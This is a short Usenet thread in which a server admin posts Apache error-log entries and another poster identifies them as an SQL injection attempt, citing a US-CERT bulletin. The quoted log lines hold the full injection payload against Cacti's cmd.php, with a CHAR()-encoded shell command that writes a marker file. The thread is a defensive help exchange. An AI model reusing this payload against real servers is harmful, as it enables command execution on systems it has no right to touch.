Re: error.log entry

Anders,

Someone or something is attempting to exploit an SQL Injection Vulnerability on your apache webserver.

http://www.us-cert.gov/cas/bulletins/SB07-001.html

Has more info.

Bogwitch.

Anders wrote:
I have found this in my /var/log/apache2/error.log and I wonder a little
of what it is.
If there is some one who can explain it to me it would be appreciated.

I have make it sure that (what ever it is) all IP's (there was only 8 of
them) from this ISP now is blocked and I have checked my server and it
seems like it is free from root-kits and other malware's.

---------
[Mon Jan 29 15:10:36 2007] [error] [client 213.215.135.124] File does not exist: /var/www/cacti, referer: http://83.252.171.112/cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,
CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),

null,1,300,0,CHAR(101,99,104,111,32,73,114,111,99,107,84,104,101,87,111,114,108,

100,32,62,32,46,47,114,114,97,47,97,112,111,46,108,111,103),null,null/**/FROM/**/host/*+11111

[Mon Jan 29 15:10:36 2007] [error] [client 213.215.135.124] File does not exist: /var/www/portal, referer: http://83.252.171.112/portal/cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,

CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,

300,0,CHAR(101,99,104,111,32,73,114,111,99,107,84,104,101,87,111,114,108,100,32,62,

32,46,47,114,114,97,47,97,112,111,46,108,111,103),null,null/**/FROM/**/host/*+11111

[Mon Jan 29 17:50:16 2007] [error] [client 213.215.135.124] File does not exist: /var/www/cacti, referer: http://83.252.171.112/cacti/rra/apo.log
[Mon Jan 29 17:50:16 2007] [error] [client 213.215.135.124] File does not exist: /var/www/portal, referer: http://83.252.171.112/portal/cacti/rra/apo.log
---------

/Anders

--
Posted via a free Usenet account from http://www.teranews.com

.